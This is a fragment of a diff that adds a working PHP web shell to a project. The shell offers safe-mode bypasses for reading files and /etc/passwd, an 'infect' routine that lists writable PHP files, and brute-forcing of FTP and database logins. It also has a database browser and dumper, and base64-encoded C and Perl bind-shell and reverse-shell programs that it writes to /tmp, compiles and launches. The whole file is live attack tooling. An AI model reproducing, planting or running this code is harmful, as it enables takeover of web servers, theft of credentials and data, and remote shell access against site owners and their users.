"; + hardFooter(); +} +function actionSafeMode() { + $temp=''; + ob_start(); + switch($_POST['p1']) { + case 1: + $temp=@tempnam($test, 'cx'); + if(@copy("compress.zlib://".$_POST['p2'], $temp)){ + echo @file_get_contents($temp); + unlink($temp); + } else + echo 'Sorry... Can\'t open file'; + break; + case 2: + $files = glob($_POST['p2'].'*'); + if( is_array($files) ) + foreach ($files as $filename) + echo $filename."\n"; + break; + case 3: + $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH); + curl_exec($ch); + break; + case 4: + ini_restore("safe_mode"); + ini_restore("open_basedir"); + include($_POST['p2']); + break; + case 5: + for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { + $uid = @posix_getpwuid($_POST['p2']); + if ($uid) + echo join(':',$uid)."\n"; + } + break; + case 6: + if(!function_exists('imap_open'))break; + $stream = imap_open($_POST['p2'], "", ""); + if ($stream == FALSE) + break; + echo imap_body($stream, 1); + imap_close($stream); + break; + } + $temp = ob_get_clean(); + hardHeader(); + echo '

Safe mode bypass

'; + echo 'Copy (read file)

Glob (list dir)

Curl (read file)

Ini_restore (read file)

Posix_getpwuid ("Read" /etc/passwd)
From
To


Imap_open (read file)
'; + if($temp) + echo '
'.$temp.'
'; + echo '
'; + hardFooter(); +} +function actionLogout() { + setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); + die('bye!'); +} +function actionSelfRemove() { + if($_POST['p1'] == 'yes') + if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) + die('Shell has been removed'); + else + echo 'unlink error!'; + if($_POST['p1'] != 'yes') + hardHeader(); + echo '

Suicide

Really want to remove the shell?
Yes
'; + hardFooter(); +} +function actionInfect() { + hardHeader(); + echo '

Infect

'; + if($_POST['p1'] == 'infect') { + $target=$_SERVER['DOCUMENT_ROOT']; + function ListFiles($dir) { + if($dh = opendir($dir)) { + $files = Array(); + $inner_files = Array(); + while($file = readdir($dh)) { + if($file != "." && $file != "..") { + if(is_dir($dir . "/" . $file)) { + $inner_files = ListFiles($dir . "/" . $file); + if(is_array($inner_files)) $files = array_merge($files, $inner_files); + } else { + array_push($files, $dir . "/" . $file); + } + } + } + closedir($dh); + return $files; + } + } + foreach (ListFiles($target) as $key=>$file){ + $nFile = substr($file, -4, 4); + if($nFile == ".php" ){ + if(($file<>$_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'])&&(is_writeable($file))){ + echo "$file
"; + $i++; + } + } + } + echo "$i"; + }else{ + echo "
"; + echo 'Really want to infect the server? Yes
'; + } + hardFooter(); +} +function actionBruteforce() { + hardHeader(); + if( isset($_POST['proto']) ) { + echo '

Results

Type: '.htmlspecialchars($_POST['proto']).' Server: '.htmlspecialchars($_POST['server']).'
'; + if( $_POST['proto'] == 'ftp' ) { + function bruteForce($ip,$port,$login,$pass) { + $fp = @ftp_connect($ip, $port?$port:21); + if(!$fp) return false; + $res = @ftp_login($fp, $login, $pass); + @ftp_close($fp); + return $res; + } + } elseif( $_POST['proto'] == 'mysql' ) { + function bruteForce($ip,$port,$login,$pass) { + $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass); + @mysql_close($res); + return $res; + } + } elseif( $_POST['proto'] == 'pgsql' ) { + function bruteForce($ip,$port,$login,$pass) { + $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; + $res = @pg_connect($str); + @pg_close($res); + return $res; + } + } + $success = 0; + $attempts = 0; + $server = explode(":", $_POST['server']); + if($_POST['type'] == 1) { + $temp = @file('/etc/passwd'); + if( is_array($temp) ) + foreach($temp as $line) { + $line = explode(":", $line); + ++$attempts; + if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { + $success++; + echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
'; + } + if(@$_POST['reverse']) { + $tmp = ""; + for($i=strlen($line[0])-1; $i>=0; --$i) + $tmp .= $line[0][$i]; + ++$attempts; + if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { + $success++; + echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp); + } + } + } + } elseif($_POST['type'] == 2) { + $temp = @file($_POST['dict']); + if( is_array($temp) ) + foreach($temp as $line) { + $line = trim($line); + ++$attempts; + if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { + $success++; + echo ''.htmlspecialchars($_POST['login']).':'.htmlspecialchars($line).'
'; + } + } + } + echo "Attempts: $attempts Success: $success

"; + } + echo '

FTP bruteforce

' + .'' + .'' + .'' + .'' + .'' + .'' + .'
Type
' + .'' + .'' + .'' + .'' + .'Server:port
Brute type /etc/passwd
reverse (login -> nigol)
Dictionary
' + .'' + .'' + .'
Login
Dictionary
' + .'
'; + echo '

'; + hardFooter(); +} +function actionSql() { + class DbClass { + var $type; + var $link; + var $res; + function DbClass($type) { + $this->type = $type; + } + function connect($host, $user, $pass, $dbname){ + switch($this->type) { + case 'mysql': + if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; + break; + case 'pgsql': + $host = explode(':', $host); + if(!$host[1]) $host[1]=5432; + if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; + break; + } + return false; + } + function selectdb($db) { + switch($this->type) { + case 'mysql': + if (@mysql_select_db($db))return true; + break; + } + return false; + } + function query($str) { + switch($this->type) { + case 'mysql': + return $this->res = @mysql_query($str); + break; + case 'pgsql': + return $this->res = @pg_query($this->link,$str); + break; + } + return false; + } + function fetch() { + $res = func_num_args()?func_get_arg(0):$this->res; + switch($this->type) { + case 'mysql': + return @mysql_fetch_assoc($res); + break; + case 'pgsql': + return @pg_fetch_assoc($res); + break; + } + return false; + } + function listDbs() { + switch($this->type) { + case 'mysql': + return $this->query("SHOW databases"); + break; + case 'pgsql': + return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); + break; + } + return false; + } + function listTables() { + switch($this->type) { + case 'mysql': + return $this->res = $this->query('SHOW TABLES'); + break; + case 'pgsql': + return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); + break; + } + return false; + } + function error() { + switch($this->type) { + case 'mysql': + return @mysql_error(); + break; + case 'pgsql': + return @pg_last_error(); + break; + } + return false; + } + function setCharset($str) { + switch($this->type) { + case 'mysql': + if(function_exists('mysql_set_charset')) + return @mysql_set_charset($str, $this->link); + else + $this->query('SET CHARSET '.$str); + break; + case 'pgsql': + return @pg_set_client_encoding($this->link, $str); + break; + } + return false; + } + function loadFile($str) { + switch($this->type) { + case 'mysql': + return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); + break; + case 'pgsql': + $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '".addslashes($str)."';select file from hard2;"); + $r=array(); + while($i=$this->fetch()) + $r[] = $i['file']; + $this->query('drop table hard2'); + return array('file'=>implode("\n",$r)); + break; + } + return false; + } + function dump($table, $fp = false) { + switch($this->type) { + case 'mysql': + $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); + $create = mysql_fetch_array($res); + $sql = $create[1].";\n"; + if($fp) fwrite($fp, $sql); else echo($sql); + $this->query('SELECT * FROM `'.$table.'`'); + $i = 0; + $head = true; + while($▟ = $this->fetch()) { + $sql = ''; + if($i % 1000 == 0) { + $head = true; + $sql = ";\n\n"; + } + $columns = array(); + foreach($▟ as $k=>$v) { + if($v === null) + $▟[$k] = "NULL"; + elseif(is_int($v)) + $▟[$k] = $v; + else + $▟[$k] = "'".@mysql_real_escape_string($v)."'"; + $columns[] = "`".$k."`"; + } + if($head) { + $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $▟).')'; + $head = false; + } else + $sql .= "\n\t,(".implode(", ", $▟).')'; + if($fp) fwrite($fp, $sql); else echo($sql); + $i++; + } + if(!$head) + if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); + break; + case 'pgsql': + $this->query('SELECT * FROM '.$table); + while($▟ = $this->fetch()) { + $columns = array(); + foreach($▟ as $k=>$v) { + $▟[$k] = "'".addslashes($v)."'"; + $columns[] = $k; + } + $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $▟).');'."\n"; + if($fp) fwrite($fp, $sql); else echo($sql); + } + break; + } + return false; + } + }; + $db = new DbClass($_POST['type']); + if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) { + $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); + $db->selectdb($_POST['sql_base']); + switch($_POST['charset']) { + case "Windows-1251": $db->setCharset('cp1251'); break; + case "UTF-8": $db->setCharset('utf8'); break; + case "KOI8-R": $db->setCharset('koi8r'); break; + case "KOI8-U": $db->setCharset('koi8u'); break; + case "cp866": $db->setCharset('cp866'); break; + } + if(empty($_POST['file'])) { + ob_start("ob_gzhandler", 4096); + header("Content-Disposition: attachment; filename=dump.sql"); + header("Content-Type: text/plain"); + foreach($_POST['tbl'] as $v) + $db->dump($v); + exit; + } elseif($fp = @fopen($_POST['file'], 'w')) { + foreach($_POST['tbl'] as $v) + $db->dump($v, $fp); + fclose($fp); + unset($_POST['p2']); + } else + die(''); + } + hardHeader(); + echo " +

Sql browser

+
+ + + + + + + + + +
TypeHostLoginPasswordDatabase
"; + $tmp = ""; + if(isset($_POST['sql_host'])){ + if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { + switch($_POST['charset']) { + case "Windows-1251": $db->setCharset('cp1251'); break; + case "UTF-8": $db->setCharset('utf8'); break; + case "KOI8-R": $db->setCharset('koi8r'); break; + case "KOI8-U": $db->setCharset('koi8u'); break; + case "cp866": $db->setCharset('cp866'); break; + } + $db->listDbs(); + echo "'; + } + else echo $tmp; + }else + echo $tmp; + echo " count the number of rows
+ "; + if(isset($db) && $db->link){ + echo "
"; + if(!empty($_POST['sql_base'])){ + $db->selectdb($_POST['sql_base']); + echo ""; + } + echo "
Tables:

"; + $tbls_res = $db->listTables(); + while($▟ = $db->fetch($tbls_res)) { + list($key, $value) = each($▟); + if(!empty($_POST['sql_count'])) + $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); + $value = htmlspecialchars($value); + echo " ".$value."" . (empty($_POST['sql_count'])?' ':" ({$n['n']})") . "
"; + } + echo "
File path:
"; + if(@$_POST['p1'] == 'select') { + $_POST['p1'] = 'query'; + $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; + $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); + $num = $db->fetch(); + $pages = ceil($num['n'] / 30); + echo "".$_POST['p2']." ({$num['n']} records) Page # "; + echo " of $pages"; + if($_POST['p3'] > 1) + echo " < Prev"; + if($_POST['p3'] < $pages) + echo " Next >"; + $_POST['p3']--; + if($_POST['type']=='pgsql') + $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); + else + $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; + echo "

"; + } + if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { + $db->query(@$_POST['p2']); + if($db->res !== false) { + $title = false; + echo ''; + $line = 1; + while($▟ = $db->fetch()) { + if(!$title) { + echo ''; + foreach($▟ as $key => $value) + echo ''; + reset($▟); + $title=true; + echo ''; + $line = 2; + } + echo ''; + $line = $line==1?2:1; + foreach($▟ as $key => $value) { + if($value == null) + echo ''; + else + echo ''; + } + echo ''; + } + echo '
'.$key.'
null'.nl2br(htmlspecialchars($value)).'
'; + } else { + echo '
Error: '.htmlspecialchars($db->error()).'
'; + } + } + echo "

"; + echo "

"; + if($_POST['type']=='mysql') { + $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); + if($db->fetch()) + echo "
Load file
"; + } + if(@$_POST['p1'] == 'loadfile') { + $file = $db->loadFile($_POST['p2']); + echo '
'.htmlspecialchars($file['file']).'
'; + } + } else { + echo htmlspecialchars($db->error()); + } + echo '
'; + hardFooter(); +} +function actionNetwork() { + hardHeader(); + $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; + $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; + $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; + $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; + echo "

Network tools

+
+ Bind port to /bin/sh
+ Port: Password: Using: +
+
+ Back-connect to
+ Server: Port: Using: +

"; + if(isset($_POST['p1'])) { + function cf($f,$t) { + $w=@fopen($f,"w") or @function_exists('file_put_contents'); + if($w) { + @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); + @fclose($w); + } + } + if($_POST['p1'] == 'bpc') { + cf("/tmp/bp.c",$bind_port_c); + $▖ = ex("gcc -o /tmp/bp /tmp/bp.c"); + @unlink("/tmp/bp.c"); + $▖ .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); + echo "
$▖".ex("ps aux | grep bp")."
"; + } + if($_POST['p1'] == 'bpp') { + cf("/tmp/bp.pl",$bind_port_p); + $▖ = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); + echo "
$▖".ex("ps aux | grep bp.pl")."
"; + } + if($_POST['p1'] == 'bcc') { + cf("/tmp/bc.c",$back_connect_c); + $▖ = ex("gcc -o /tmp/bc /tmp/bc.c"); + @unlink("/tmp/bc.c"); + $▖ .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); + echo "
$▖".ex("ps aux | grep bc")."
"; + } + if($_POST['p1'] == 'bcp') { + cf("/tmp/bc.pl",$back_connect_p); + $▖ = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); + echo "
$▖".ex("ps aux | grep bc.pl")."
"; + } + } + echo '
'; + hardFooter(); +} +if( empty($_POST['a']) ) + if(isset($▚) && function_exists('action' . $▚)) + $_POST['a'] = $▚; + else + $_POST['a'] = 'FilesMan'; +if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) + call_user_func('action' . $_POST['a']); +?>